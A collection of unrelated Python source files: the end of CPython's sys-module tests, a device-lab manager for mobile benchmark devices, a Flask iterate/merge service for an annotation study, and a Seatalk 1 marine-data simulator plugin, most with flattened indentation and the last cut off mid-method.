entered_g.wait()
# At this point, t has finished its entered_g.set(), although it's
# impossible to guess whether it's still on that line or has moved on
# to its leave_g.wait().
self.assertEqual(len(thread_info), 1)
thread_id = thread_info[0]
d = sys._current_frames()
main_id = _thread.get_ident()
self.assert_(main_id in d)
self.assert_(thread_id in d)
# Verify that the captured main-thread frame is _this_ frame.
frame = d.pop(main_id)
self.assert_(frame is sys._getframe())
# Verify that the captured thread frame is blocked in g456, called
        # from f123. This is a little tricky, since various bits of
# threading.py are also in the thread's call stack.
frame = d.pop(thread_id)
stack = traceback.extract_stack(frame)
for i, (filename, lineno, funcname, sourceline) in enumerate(stack):
if funcname == "f123":
break
else:
self.fail("didn't find f123() on thread's call stack")
self.assertEqual(sourceline, "g456()")
# And the next record must be for g456().
filename, lineno, funcname, sourceline = stack[i+1]
self.assertEqual(funcname, "g456")
self.assert_(sourceline in ["leave_g.wait()", "entered_g.set()"])
# Reap the spawned thread.
leave_g.set()
t.join()
# Test sys._current_frames() when thread support doesn't exist.
def current_frames_without_threads(self):
# Not much happens here: there is only one thread, with artificial
# "thread id" 0.
d = sys._current_frames()
self.assertEqual(len(d), 1)
self.assert_(0 in d)
self.assert_(d[0] is sys._getframe())
def test_attributes(self):
self.assert_(isinstance(sys.api_version, int))
self.assert_(isinstance(sys.argv, list))
self.assert_(sys.byteorder in ("little", "big"))
self.assert_(isinstance(sys.builtin_module_names, tuple))
self.assert_(isinstance(sys.copyright, str))
self.assert_(isinstance(sys.exec_prefix, str))
self.assert_(isinstance(sys.executable, str))
self.assertEqual(len(sys.float_info), 11)
self.assertEqual(sys.float_info.radix, 2)
self.assert_(isinstance(sys.hexversion, int))
self.assert_(isinstance(sys.maxsize, int))
self.assert_(isinstance(sys.maxunicode, int))
self.assert_(isinstance(sys.platform, str))
self.assert_(isinstance(sys.prefix, str))
self.assert_(isinstance(sys.version, str))
vi = sys.version_info
self.assert_(isinstance(vi, tuple))
self.assertEqual(len(vi), 5)
self.assert_(isinstance(vi[0], int))
self.assert_(isinstance(vi[1], int))
self.assert_(isinstance(vi[2], int))
self.assert_(vi[3] in ("alpha", "beta", "candidate", "final"))
self.assert_(isinstance(vi[4], int))
def test_43581(self):
# Can't use sys.stdout, as this is a StringIO object when
# the test runs under regrtest.
self.assertEqual(sys.__stdout__.encoding, sys.__stderr__.encoding)
def test_intern(self):
self.assertRaises(TypeError, sys.intern)
s = "never interned before"
self.assert_(sys.intern(s) is s)
s2 = s.swapcase().swapcase()
self.assert_(sys.intern(s2) is s)
# Subclasses of string can't be interned, because they
# provide too much opportunity for insane things to happen.
# We don't want them in the interned dict and if they aren't
# actually interned, we don't want to create the appearance
        # that they are by allowing intern() to succeed.
class S(str):
def __hash__(self):
return 123
self.assertRaises(TypeError, sys.intern, S("abc"))
def test_sys_flags(self):
self.failUnless(sys.flags)
attrs = ("debug", "division_warning",
"inspect", "interactive", "optimize", "dont_write_bytecode",
"no_user_site", "no_site", "ignore_environment", "verbose",
"bytes_warning")
for attr in attrs:
self.assert_(hasattr(sys.flags, attr), attr)
self.assertEqual(type(getattr(sys.flags, attr)), int, attr)
self.assert_(repr(sys.flags))
self.assertEqual(len(sys.flags), len(attrs))
def test_clear_type_cache(self):
sys._clear_type_cache()
def test_ioencoding(self):
import subprocess,os
env = dict(os.environ)
# Test character: cent sign, encoded as 0x4A (ASCII J) in CP424,
# not representable in ASCII.
env["PYTHONIOENCODING"] = "cp424"
p = subprocess.Popen([sys.executable, "-c", 'print(chr(0xa2))'],
stdout = subprocess.PIPE, env=env)
out = p.stdout.read()
self.assertEqual(out, "\xa2\n".encode("cp424"))
env["PYTHONIOENCODING"] = "ascii:replace"
p = subprocess.Popen([sys.executable, "-c", 'print(chr(0xa2))'],
stdout = subprocess.PIPE, env=env)
out = p.stdout.read().strip()
self.assertEqual(out, b'?')
class SizeofTest(unittest.TestCase):
TPFLAGS_HAVE_GC = 1<<14
TPFLAGS_HEAPTYPE = 1<<9
def setUp(self):
self.c = len(struct.pack('c', ' '))
self.H = len(struct.pack('H', 0))
self.i = len(struct.pack('i', 0))
self.l = len(struct.pack('l', 0))
self.P = len(struct.pack('P', 0))
# due to missing size_t information from struct, it is assumed that
# sizeof(Py_ssize_t) = sizeof(void*)
self.header = 'PP'
self.vheader = self.header + 'P'
if hasattr(sys, "gettotalrefcount"):
self.header += '2P'
self.vheader += '2P'
import _testcapi
self.gc_headsize = _testcapi.SIZEOF_PYGC_HEAD
self.file = open(test.support.TESTFN, 'wb')
def tearDown(self):
self.file.close()
test.support.unlink(test.support.TESTFN)
def check_sizeof(self, o, size):
result = sys.getsizeof(o)
# add GC header size
if ((type(o) == type) and (o.__flags__ & self.TPFLAGS_HEAPTYPE) or\
((type(o) != type) and (type(o).__flags__ & self.TPFLAGS_HAVE_GC))):
size += self.gc_headsize
msg = 'wrong size for %s: got %d, expected %d' \
% (type(o), result, size)
self.assertEqual(result, size, msg)
def calcsize(self, fmt):
"""Wrapper around struct.calcsize which enforces the alignment of the
end of a structure to the alignment requirement of pointer.
Note: This wrapper should only be used if a pointer member is included
and no member with a size larger than a pointer exists.
"""
return struct.calcsize(fmt + '0P')
def test_gc_head_size(self):
# Check that the gc header size is added to objects tracked by the gc.
h = self.header
vh = self.vheader
size = self.calcsize
gc_header_size = self.gc_headsize
# bool objects are not gc tracked
self.assertEqual(sys.getsizeof(True), size(vh) + self.H)
# but lists are
self.assertEqual(sys.getsizeof([]), size(vh + 'PP') + gc_header_size)
def test_default(self):
h = self.header
vh = self.vheader
size = self.calcsize
self.assertEqual(sys.getsizeof(True), size(vh) + self.H)
self.assertEqual(sys.getsizeof(True, -1), size(vh) + self.H)
def test_objecttypes(self):
# check all types defined in Objects/
h = self.header
vh = self.vheader
size = self.calcsize
check = self.check_sizeof
# bool
check(True, size(vh) + self.H)
# buffer
# XXX
# builtin_function_or_method
check(len, size(h + '3P'))
# bytearray
samples = [b'', b'u'*100000]
for sample in samples:
x = bytearray(sample)
check(x, size(vh + 'iPP') + x.__alloc__() * self.c)
# bytearray_iterator
check(iter(bytearray()), size(h + 'PP'))
# cell
def get_cell():
x = 42
def inner():
return x
return inner
check(get_cell().__closure__[0], size(h + 'P'))
# code
check(get_cell().__code__, size(h + '5i8Pi2P'))
# complex
check(complex(0,1), size(h + '2d'))
# method_descriptor (descriptor object)
check(str.lower, size(h + '2PP'))
# classmethod_descriptor (descriptor object)
# XXX
# member_descriptor (descriptor object)
import datetime
check(datetime.timedelta.days, size(h + '2PP'))
# getset_descriptor (descriptor object)
import collections
check(collections.defaultdict.default_factory, size(h + '2PP'))
# wrapper_descriptor (descriptor object)
check(int.__add__, size(h + '2P2P'))
# method-wrapper (descriptor object)
check({}.__iter__, size(h + '2P'))
# dict
check({}, size(h + '3P2P' + 8*'P2P'))
longdict = {1:1, 2:2, 3:3, 4:4, 5:5, 6:6, 7:7, 8:8}
check(longdict, size(h + '3P2P' + 8*'P2P') + 16*size('P2P'))
# dictionary-keyiterator
check({}.keys(), size(h + 'P'))
# dictionary-valueiterator
check({}.values(), size(h + 'P'))
# dictionary-itemiterator
check({}.items(), size(h + 'P'))
# dictproxy
class C(object): pass
check(C.__dict__, size(h + 'P'))
# BaseException
check(BaseException(), size(h + '5P'))
# UnicodeEncodeError
check(UnicodeEncodeError("", "", 0, 0, ""), size(h + '5P 2P2PP'))
# UnicodeDecodeError
# XXX
# check(UnicodeDecodeError("", "", 0, 0, ""), size(h + '5P2PP'))
# UnicodeTranslateError
check(UnicodeTranslateError("", 0, 1, ""), size(h + '5P 2P2PP'))
# ellipses
check(Ellipsis, size(h + ''))
# EncodingMap
import codecs, encodings.iso8859_3
x = codecs.charmap_build(encodings.iso8859_3.decoding_table)
check(x, size(h + '32B2iB'))
# enumerate
check(enumerate([]), size(h + 'l3P'))
# reverse
check(reversed(''), size(h + 'PP'))
# float
check(float(0), size(h + 'd'))
# sys.floatinfo
check(sys.float_info, size(vh) + self.P * len(sys.float_info))
# frame
import inspect
CO_MAXBLOCKS = 20
x = inspect.currentframe()
ncells = len(x.f_code.co_cellvars)
nfrees = len(x.f_code.co_freevars)
extras = x.f_code.co_stacksize + x.f_code.co_nlocals +\
ncells + nfrees - 1
check(x, size(vh + '12P3i' + CO_MAXBLOCKS*'3i' + 'P' + extras*'P'))
# function
def func(): pass
check(func, size(h + '11P'))
class c():
@staticmethod
def foo():
pass
@classmethod
def bar(cls):
pass
# staticmethod
check(foo, size(h + 'P'))
# classmethod
check(bar, size(h + 'P'))
# generator
def get_gen(): yield 1
check(get_gen(), size(h + 'Pi2P'))
# iterator
check(iter('abc'), size(h + 'lP'))
# callable-iterator
import re
check(re.finditer('',''), size(h + '2P'))
# list
samples = [[], [1,2,3], ['1', '2', '3']]
for sample in samples:
check(sample, size(vh + 'PP') + len(sample)*self.P)
# sortwrapper (list)
# XXX
# cmpwrapper (list)
# XXX
# listiterator (list)
check(iter([]), size(h + 'lP'))
# listreverseiterator (list)
check(reversed([]), size(h + 'lP'))
# long
check(0, size(vh))
check(1, size(vh) + self.H)
check(-1, size(vh) + self.H)
check(32768, size(vh) + 2*self.H)
check(32768*32768-1, size(vh) + 2*self.H)
check(32768*32768, size(vh) + 3*self.H)
# memory
check(memoryview(b''), size(h + 'P PP2P2i5P'))
# module
check(unittest, size(h + '3P'))
# None
check(None, size(h + ''))
# NotImplementedType
check(NotImplemented, size(h))
# object
check(object(), size(h + ''))
# property (descriptor object)
class C(object):
def getx(self): return self.__x
def setx(self, value): self.__x = value
def delx(self): del self.__x
x = property(getx, setx, delx, "")
check(x, size(h + '4Pi'))
# PyCObject
# XXX
# rangeiterator
check(iter(range(1)), size(h + '4l'))
# reverse
check(reversed(''), size(h + 'PP'))
# range
check(range(1), size(h + '3P'))
check(range(66000), size(h + '3P'))
# set
# frozenset
PySet_MINSIZE = 8
samples = [[], range(10), range(50)]
s = size(h + '3P2P' + PySet_MINSIZE*'lP' + 'lP')
for sample in samples:
minused = len(sample)
if minused == 0: tmp = 1
# the computation of minused is actually a bit more complicated
# but this suffices for the sizeof test
minused = minused*2
newsize = PySet_MINSIZE
while newsize <= minused:
newsize = newsize << 1
if newsize <= 8:
check(set(sample), s)
check(frozenset(sample), s)
else:
check(set(sample), s + newsize*struct.calcsize('lP'))
check(frozenset(sample), s + newsize*struct.calcsize('lP'))
# setiterator
check(iter(set()), size(h + 'P3P'))
# slice
check(slice(0), size(h + '3P'))
# super
check(super(int), size(h + '3P'))
# tuple
check((), size(vh))
check((1,2,3), size(vh) + 3*self.P)
# type
# (PyTypeObject + PyNumberMethods + PyMappingMethods +
# PySequenceMethods + PyBufferProcs)
s = size(vh + 'P2P15Pl4PP9PP11PI') + size('16Pi17P 3P 10P 2P 2P')
check(int, s)
# class
class newstyleclass(object): pass
check(newstyleclass, s)
# unicode
usize = len('\0'.encode('unicode-internal'))
samples = ['', '1'*100]
# we need to test for both sizes, because we don't know if the string
# has been cached
for s in samples:
basicsize = size(h + 'PPliP') + usize * (len(s) + 1)
check(s, basicsize)
# weakref
import weakref
check(weakref.ref(int), size(h + '2Pl2P'))
# weakproxy
# XXX
# weakcallableproxy
check(weakref.proxy(int), size(h + '2Pl2P'))
def test_pythontypes(self):
# check all types defined in Python/
h = self.header
vh = self.vheader
size = self.calcsize
check = self.check_sizeof
# _ast.AST
import _ast
check(_ast.AST(), size(h + ''))
# imp.NullImporter
import imp
check(imp.NullImporter(self.file.name), size(h + ''))
try:
raise TypeError
except TypeError:
tb = sys.exc_info()[2]
# traceback
if tb != None:
check(tb, size(h + '2P2i'))
# symtable entry
# XXX
# sys.flags
check(sys.flags, size(vh) + self.P * len(sys.flags))
def test_setfilesystemencoding(self):
old = sys.getfilesystemencoding()
sys.setfilesystemencoding("iso-8859-1")
self.assertEqual(sys.getfilesystemencoding(), "iso-8859-1")
sys.setfilesystemencoding(old)
def test_main():
test.support.run_unittest(SysModuleTest, SizeofTest)
if __name__ == "__main__":
test_main()
|
device_manager.py
|
#!/usr/bin/env python
##############################################################################
# Copyright 2020-present, Facebook, Inc.
# All rights reserved.
#
# This source code is licensed under the license found in the
# LICENSE file in the root directory of this source tree.
##############################################################################
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import datetime
import json
import time
from threading import Thread, RLock
from typing import Dict
from bridge.db import DBDriver
from get_connected_devices import GetConnectedDevices
from platforms.android.adb import ADB
from platforms.platforms import getDeviceList
from reboot_device import reboot as reboot_device
from utils.custom_logger import getLogger
REBOOT_INTERVAL = datetime.timedelta(hours=8)
MINIMUM_DM_INTERVAL = 10
DEFAULT_DM_INTERVAL = 10
def getDevicesString(devices):
device_list = [
d["kind"]
+ "|"
+ d["hash"]
+ "|"
+ d["name"]
+ "|"
+ d["abi"]
+ "|"
+ d["os"]
+ "|"
+ ("1" if d["available"] else "0" if d["live"] else "2")
for d in devices
]
devices_str = ",".join(device_list)
return devices_str
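# Illustrative example of the serialized form (hypothetical device entry, not part of this module's API):
# getDevicesString([{"kind": "SM-G960U", "hash": "ABC123", "name": "galaxy-s9",
#                    "abi": "arm64-v8a", "os": "10", "available": True, "live": True}])
# -> "SM-G960U|ABC123|galaxy-s9|arm64-v8a|10|1"
# The trailing flag is "1" when the device is available, "0" when live but unavailable, and "2" otherwise.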
def valid_dm_interval(arg) -> int:
try:
value = int(arg)
if value < MINIMUM_DM_INTERVAL:
raise ValueError()
except ValueError:
getLogger().warning(
"Logging interval must be specified as an integer in seconds >= {}. Using default {}s.".format(
MINIMUM_DM_INTERVAL, DEFAULT_DM_INTERVAL
)
)
value = DEFAULT_DM_INTERVAL
return value
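# Illustrative argparse wiring (assumed to live in the lab's argument parser elsewhere in this package):
# parser.add_argument("--device_monitor_interval", type=valid_dm_interval, default=DEFAULT_DM_INTERVAL,
#                     help="Seconds between device monitor passes (minimum {}s).".format(MINIMUM_DM_INTERVAL))
# Values below MINIMUM_DM_INTERVAL (or non-integer values) fall back to DEFAULT_DM_INTERVAL with a
# warning instead of aborting startup.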
class DeviceManager(object):
"""
Provides devices metadata to the lab instance. For mobile platforms, checks connectivity of devices and performs updates to lab devices and db.
"""
def __init__(self, args: Dict, db: DBDriver):
self.args = args
self.db: DBDriver = db
self.lab_devices = {}
self.online_devices = None
self._initializeDevices()
self.running = True
self.device_monitor_interval = self.args.device_monitor_interval
self.device_monitor = Thread(target=self._runDeviceMonitor)
self.device_monitor.start()
if self.args.usb_hub_device_mapping:
from utils.usb_controller import USBController
self.usb_controller = USBController(self.args.usb_hub_device_mapping)
else:
self.usb_controller = None
def getLabDevices(self):
"""Return a reference to the lab's device meta data."""
return self.lab_devices
def _runDeviceMonitor(self):
while self.running:
# if the lab is hosting mobile devices, thread will monitor connectivity of devices.
if self.args.platform.startswith(
"android"
) or self.args.platform.startswith("ios"):
self._checkDevices()
self._updateHeartbeats()
time.sleep(self.device_monitor_interval)
def _checkDevices(self):
"""Run any device health checks, e.g. connectivity, battery, etc."""
try:
online_hashes = getDeviceList(self.args, silent=True)
offline_devices = [
device
for device in self.online_devices
if device["hash"] not in online_hashes
]
new_devices = [
h
for h in online_hashes
if h not in [p["hash"] for p in self.online_devices]
]
if offline_devices:
for offline_device in offline_devices:
lab_device = self.lab_devices[offline_device["kind"]][
offline_device["hash"]
]
usb_disabled = False
if self.usb_controller and not self.usb_controller.active.get(
lab_device["hash"], True
):
usb_disabled = True
if "rebooting" not in lab_device and not usb_disabled:
getLogger().error(
"Device {} has become unavailable.".format(offline_device)
)
self._disableDevice(offline_device)
if new_devices:
devices = ",".join(new_devices)
devices = self._getDevices(devices)
if devices:
for d in devices:
self._enableDevice(d)
if d["hash"] not in [
device["hash"] for device in self.online_devices
]:
self.online_devices.append(d)
getLogger().info("New device added: {}".format(d))
except BaseException:
getLogger().exception("Error while checking devices.")
def _updateHeartbeats(self):
"""Update device heartbeats for all devices which are marked "live" in lab devices."""
claimer_id = self.args.claimer_id
hashes = []
for k in self.lab_devices:
for hash in self.lab_devices[k]:
if self.lab_devices[k][hash]["live"]:
hashes.append(hash)
hashes = ",".join(hashes)
self.db.updateHeartbeats(claimer_id, hashes)
def _getDevices(self, devices=None):
"""Get list of device meta data for available devices."""
raw_args = []
raw_args.extend(["--platform", self.args.platform])
if self.args.platform_sig:
raw_args.append("--platform_sig")
raw_args.append(self.args.platform_sig)
if devices:
raw_args.append("--devices")
raw_args.append(devices)
elif self.args.devices:
raw_args.append("--devices")
raw_args.append(self.args.devices)
if self.args.hash_platform_mapping:
            # if the user provides a filename, load the mapping from it.
raw_args.append("--hash_platform_mapping")
raw_args.append(self.args.hash_platform_mapping)
if self.args.device_name_mapping:
            # if the user provides a filename, load the mapping from it.
raw_args.append("--device_name_mapping")
raw_args.append(self.args.device_name_mapping)
app = GetConnectedDevices(raw_args=raw_args)
devices_json = app.run()
assert devices_json, "Devices cannot be empty"
devices = json.loads(devices_json.strip())
return devices
def _initializeDevices(self):
"""Create device meta data used by lab instance, and update devices in db."""
self.online_devices = self._getDevices()
for k in self.online_devices:
kind = k["kind"]
hash = k["hash"]
name = k["name"]
abi = k["abi"]
os = k["os"]
entry = {
"kind": kind,
"hash": hash,
"name": name,
"abi": abi,
"os": os,
"available": True,
"live": True,
"start_time": None,
"done_time": None,
"output_dir": None,
"job": None,
"adb": ADB(hash, self.args.android_dir),
"reboot_time": datetime.datetime.now() - datetime.timedelta(hours=8),
"usb_hub": {},
}
if kind not in self.lab_devices:
self.lab_devices[kind] = {}
self.lab_devices[kind][hash] = entry
dvs = [
self.lab_devices[k][h]
for k in self.lab_devices
for h in self.lab_devices[k]
]
self.db.updateDevices(self.args.claimer_id, getDevicesString(dvs), True)
def _disableDevice(self, device):
kind = device["kind"]
hash = device["hash"]
entry = self.lab_devices[kind][hash]
entry["available"] = False
entry["live"] = False
self.online_devices.remove(device)
self.db.updateDevices(
self.args.claimer_id,
getDevicesString([self.lab_devices[kind][hash]]),
False,
)
def _enableDevice(self, device):
kind = device["kind"]
hash = device["hash"]
name = device["name"]
abi = device["abi"]
os = device["os"]
entry = {
"kind": kind,
"hash": hash,
"name": name,
"abi": abi,
"os": os,
"available": True,
"live": True,
"start_time": None,
"done_time": None,
"output_dir": None,
"job": None,
"adb": ADB(hash, self.args.android_dir),
"reboot_time": datetime.datetime.now() - datetime.timedelta(hours=8),
"usb_hub": {},
}
if kind not in self.lab_devices:
self.lab_devices[kind] = {}
self.lab_devices[kind][hash] = entry
self.db.updateDevices(
self.args.claimer_id,
getDevicesString([self.lab_devices[kind][hash]]),
False,
)
def _sendErrorReport(self, emsg):
# TODO: send alert to support team to troubleshoot
raise NotImplementedError
def shutdown(self):
self.db.updateDevices(self.args.claimer_id, "", True)
self.running = False
class CoolDownDevice(Thread):
"""Used by AsyncRun to cool device down after benchmark. Will reboot the device if required and add rebooting status to device entry."""
def __init__(self, device, args, db, force_reboot, LOCK: RLock):
Thread.__init__(self)
self.device = device
self.args = args
self.db = db
self.force_reboot = force_reboot
self.LOCK = LOCK
def run(self):
reboot = self.args.reboot and (
self.force_reboot
or self.device["reboot_time"] + REBOOT_INTERVAL < datetime.datetime.now()
)
success = True
# reboot mobile devices if required
if reboot:
raw_args = []
raw_args.extend(["--platform", self.args.platform])
raw_args.extend(["--device", self.device["hash"]])
raw_args.extend(["--android_dir", self.args.android_dir])
self.device["rebooting"] = True
if reboot_device(raw_args=raw_args):
getLogger().info("Device {} was rebooted.".format(self.device))
self.device["reboot_time"] = datetime.datetime.now()
else:
self.device.pop("rebooting")
getLogger().error(
"Device {} could not be rebooted.".format(self.device)
)
success = False
# sleep for device cooldown
if self.args.platform.startswith("ios") or self.args.platform.startswith(
"android"
):
getLogger().info("Sleep 180 seconds")
time.sleep(180)
else:
getLogger().info("Sleep 20 seconds")
time.sleep(20)
with self.LOCK:
getLogger().info("CoolDownDevice lock acquired")
# device should be available again, remove rebooting flag.
if "rebooting" in self.device:
del self.device["rebooting"]
if success:
self.device["available"] = True
device_str = getDevicesString([self.device])
self.db.updateDevices(self.args.claimer_id, device_str, False)
getLogger().info(
"Device {}({}) available".format(
self.device["kind"], self.device["hash"]
)
)
else:
self.device["live"] = False
getLogger().info("CoolDownDevice lock released")
|
iterate_service.py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# import python libs
from flask import Flask
from flask import jsonify
from flask import request
from pprint import pprint as pp
import argparse
import json
import logging
import sys
import socket
import requests
import threading
# import project libs
sys.path.append('lib')
import iteration_processing
import merge_processing
# defining globals & constants
global app
global args
app = Flask(__name__)
# Flask routes
@app.route('/iterate', methods=['GET'])
def iterate_who_are_you():
message = {
'role': 'iterate',
'title': 'Research Study Iterator',
'description': 'Iterating pregenerated data for Robert\'s research study.',
'version': 1.0,
'problem_id': 'ner',
'interface_types': [ 'ner_complete', 'questionnaire' ]
}
return create_json_response_from(message)
@app.route('/iterate', methods=['POST'])
def iterate():
    if args.async_mode:
logging.info('iterate request (async)')
data = request.json
threading.Thread(target=async_iteration_processing, args=(data,)).start()
return create_json_response_from({ 'status': 'async' })
else:
logging.info('iterate request (request)')
documents = iteration_processing.process_iteration(request.json['raw_data'])
return create_json_response_from({
'annotation_documents': documents
})
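# Rough shape of the POST body the /iterate route expects (field names are taken from the
# handlers above; the raw_data payload itself is application-specific and only sketched here):
#   {
#     "raw_data": [ ...pregenerated documents... ],
#     "callback_urls": ["http://dalphi.example/annotation_callback"]   # used only in --async mode
#   }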
def async_iteration_processing(data):
documents = iteration_processing.process_iteration(data['raw_data'])
annotation_documents = { 'annotation_documents': documents }
res = requests.post(
data['callback_urls'][0],
data=json.dumps(annotation_documents),
headers={ 'Content-Type': 'application/json' }
)
@app.route('/merge', methods=['GET'])
def merge_who_are_you():
message = {
'role': 'merge',
'title': 'Research Study Merger',
'description': 'Merges subject annotations data for Robert\'s research study.',
'version': 1.0,
'problem_id': 'ner'
}
return create_json_response_from(message)
@app.route('/merge', methods=['POST'])
def merge():
    if args.async_mode:
logging.info('merge request (async)')
data = request.json
threading.Thread(target=async_merge_processing, args=(data,)).start()
return create_json_response_from({ 'status': 'async' })
else:
logging.info('merge request (request)')
(raw_datum_id, annotation_documents) = merge_processing.decode_post_data(request.json)
logging.info('received %s documents as parts of raw datum #%s' % (len(annotation_documents), raw_datum_id))
raw_datum = merge_processing.create_new_raw_datum(raw_datum_id, annotation_documents)
return create_json_response_from(raw_datum)
def async_merge_processing(data):
(raw_datum_id, annotation_documents) = merge_processing.decode_post_data(data)
logging.info('received %s documents as parts of raw datum #%s' % (len(annotation_documents), raw_datum_id))
raw_datum = merge_processing.create_new_raw_datum(raw_datum_id, annotation_documents)
res = requests.patch(
data['callback_url'],
data=json.dumps(raw_datum),
headers={ 'Content-Type': 'application/json' }
)
# helpers
def create_json_response_from(payload):
    response = jsonify(payload)
    response.status_code = 200
    return response
# entry point as a stand alone script
if __name__ == '__main__':
usePort = 5200
useHost = 'localhost'
parser = argparse.ArgumentParser(
description='Research Study Iterate & Merge Service; 17.02.17 Robert Greinacher')
parser.add_argument(
'-a',
'--async',
action='store_true',
        dest='async_mode',  # 'async' is a reserved word since Python 3.7, so use a different dest
        help='communicate asynchronously (non-blocking) with DALPHI')
parser.add_argument(
'-d',
'--daemon',
action='store_true',
dest='daemon',
help='enables daemon mode')
parser.add_argument(
'-l',
'--localhost',
action='store_true',
dest='localhost',
help='use "localhost" instead of current network IP')
parser.add_argument(
'-p',
'--port',
type=int,
help='set the network port number')
parser.add_argument(
'-v',
'--verbose',
action='store_true',
dest='verbose',
help='enables verbose mode')
args = parser.parse_args()
if args.port:
usePort = args.port
if not args.localhost:
        hostname = socket.gethostname()
        useHost = socket.gethostbyname(hostname)
    logging.basicConfig(filename='service.log', level=logging.INFO,
                        format="%(asctime)s - %(name)s - %(levelname)s - %(message)s")
logging.getLogger().addHandler(logging.StreamHandler())
logging.info('start running flask app')
app.run(useHost, usePort, args.verbose)
|
plugin.py
|
import time
import threading
import serial
class Plugin:
CONFIG=[
{
'name': 'device',
'description': 'set to the device path (alternative to usbid)',
'default': '/dev/ttyUSB_SeatalkOut'
},
{
'name': 'usbid',
'description': 'set to the usbid of the device (alternative to device)',
'default': ''
},
{
'name': 'target',
'description': 'select the target (rs232 rpi-gpio)',
'default': 'rs232'
},
{
'name': 'debuglevel',
'description': 'set to the debuglevel',
'default': '0'
},
{
'name': 'dynamic',
'description': 'enable dynamic',
'default': '0'
}
]
@classmethod
def pluginInfo(cls):
"""
the description for the module
@return: a dict with the content described below
parts:
* description (mandatory)
* data: list of keys to be stored (optional)
        * path - the key - see AVNApi.addData, all paths starting with "gps." will be sent to the GUI
* description
"""
return {
'description': 'seatalk 1 protocol generator',
'config': cls.CONFIG,
'data': [
]
}
def __init__(self,api):
"""
    initialize the plugin
do any checks here and throw an exception on error
do not yet start any threads!
@param api: the api to communicate with avnav
@type api: AVNApi
"""
self.api = api # type: AVNApi
#we register an handler for API requests
self.lastReceived=0
self.isConnected=False
self.connection=None
self.device=None
self.debuglevel=None
self.dynamic=None
self.target=None
self.isBusy=False
self.condition=threading.Condition()
if hasattr(self.api,'registerEditableParameters'):
self.api.registerEditableParameters(self.CONFIG,self._changeConfig)
if hasattr(self.api,'registerRestart'):
self.api.registerRestart(self._apiRestart)
self.changeSequence=0
self.startSequence=0
self.DBT = 6.7
self.DBT_step = 0.1
self.STW = 10.9
self.STW_step = 0.5
def _apiRestart(self):
self.startSequence+=1
self.changeSequence+=1
def _changeConfig(self,newValues):
self.api.saveConfigValues(newValues)
self.changeSequence+=1
def getConfigValue(self,name):
defaults=self.pluginInfo()['config']
for cf in defaults:
if cf['name'] == name:
return self.api.getConfigValue(name,cf.get('default'))
return self.api.getConfigValue(name)
def run(self):
startSequence=self.startSequence
while startSequence == self.startSequence:
try:
#only AvNav after 20210224
self.api.deregisterUsbHandler()
except:
pass
self.runInternal()
def runInternal(self):
"""
the run method
this will be called after successfully instantiating an instance
this method will be called in a separate Thread
    The plugin periodically sends depth (DBT), speed through water (STW) and water temperature (MTW) frames via Seatalk 1
@return:
"""
changeSequence=self.changeSequence
seq=0
self.api.log("started")
self.api.setStatus('STARTED', 'running')
enabled=self.getConfigValue('enabled')
if enabled is not None and enabled.lower()!='true':
self.api.setStatus("INACTIVE", "disabled by config")
return
usbid=None
try:
self.device=self.getConfigValue('device')
self.dynamic=self.getConfigValue('dynamic')
self.debuglevel=self.getConfigValue('debuglevel')
self.target=self.getConfigValue('target')
usbid=self.getConfigValue('usbid')
if usbid == '':
usbid=None
if self.device == '':
self.device=None
if self.device is None and usbid is None:
raise Exception("missing config value device or usbid")
if self.device is not None and usbid is not None:
raise Exception("only one of device or usbid can be set")
except Exception as e:
self.api.setStatus("ERROR", "config error %s "%str(e))
while changeSequence == self.changeSequence:
time.sleep(0.5)
return
if usbid is not None:
self.api.registerUsbHandler(usbid,self.deviceConnected)
self.api.setStatus("STARTED", "using usbid %s, baud=4800" % (usbid))
else:
self.api.setStatus("STARTED","using device %s, baud=4800"%(self.device))
connectionHandler=threading.Thread(target=self.handleConnection, name='seatalk1-simulator-rs232')
connectionHandler.setDaemon(True)
connectionHandler.start()
while changeSequence == self.changeSequence:
if not self.isConnected:
return {'status': 'not connected'}
try:
''' DPT: 00 02 YZ XX XX Depth below transducer: XXXX/10 feet '''
''' write DBT Seatalk frame => 0x00DD => 22,1 feets => 6,736 meters (divisor 3,683) '''
self.connection.flushOutput()
self.connection.parity = serial.PARITY_MARK
if(self.target == "rpi-gpio"):
self.connection.write(b'\x00\x42')
else:
self.connection.write(b'\x00')
time.sleep(0.1)
self.connection.parity = serial.PARITY_SPACE
if(self.target == "rpi-gpio"):
self.connection.write(b'\x64')
else:
self.connection.write(b'\x42\x64')
DBT = int((self.DBT * (10.0 * 3.281)) + 0.5)
byte_array = DBT.to_bytes(2,"little")
self.connection.write(byte_array)
time.sleep(0.1)
if(int(self.debuglevel) > 0):
self.api.log("SEATALK DBT frame written: "+ str(self.DBT) + ", INT: " + str(DBT))
''' STW: 20 01 XX XX Speed through water: XXXX/10 Knots '''
''' write STW Seatalk frame => 0x003b => 5,9 kn => 10,93 km/h (multiply with 1,852)'''
self.connection.flushOutput()
self.connection.parity = serial.PARITY_MARK
if(self.target == "rpi-gpio"):
self.connection.write(b'\x20\x41')
else:
self.connection.write(b'\x20')
time.sleep(0.1)
self.connection.parity = serial.PARITY_SPACE
if(self.target != "rpi-gpio"):
self.connection.write(b'\x41')
STW = int((((self.STW * 10.0) / 1.852)) + 0.5)
byte_array = STW.to_bytes(2,"little")
self.connection.write(byte_array)
time.sleep(0.1)
if(int(self.debuglevel) > 0):
self.api.log("SEATALK STW frame written: " + str(self.STW) + ", INT: " + str(STW))
''' MTW: 23 01 XX YY water temperature: XX deg C, YY deg F '''
self.connection.flushOutput()
self.connection.parity = serial.PARITY_MARK
if(self.target == "rpi-gpio"):
self.connection.write(b'\x23\x41')
else:
self.connection.write(b'\x23')
time.sleep(0.1)
self.connection.parity = serial.PARITY_SPACE
if(self.target != "rpi-gpio"):
self.connection.write(b'\x41')
self.connection.write(b'\x04')
self.connection.write(b'\x27')
time.sleep(0.1)
                # note: the MTW frame always carries the fixed bytes 0x04 0x27 (4 degC / 39 degF), so there is no dynamic value to log here
except Exception as e:
self.api.error("unable to send command to %s: %s" % (self.device, str(e)))
time.sleep(1)
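  # Worked example of the DBT encoding used in runInternal above (numbers only, no device I/O):
  # a depth of 6.7 m becomes tenths of feet, 6.7 * 3.281 * 10 ~= 220 = 0x00DC, which is written
  # little-endian as the two XX XX bytes of the "00 02 YZ XX XX" Seatalk datagram.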
def handleConnection(self):
changeSequence=self.changeSequence
errorReported=False
lastDevice=None
while changeSequence == self.changeSequence:
if self.device is not None:
if self.device != lastDevice:
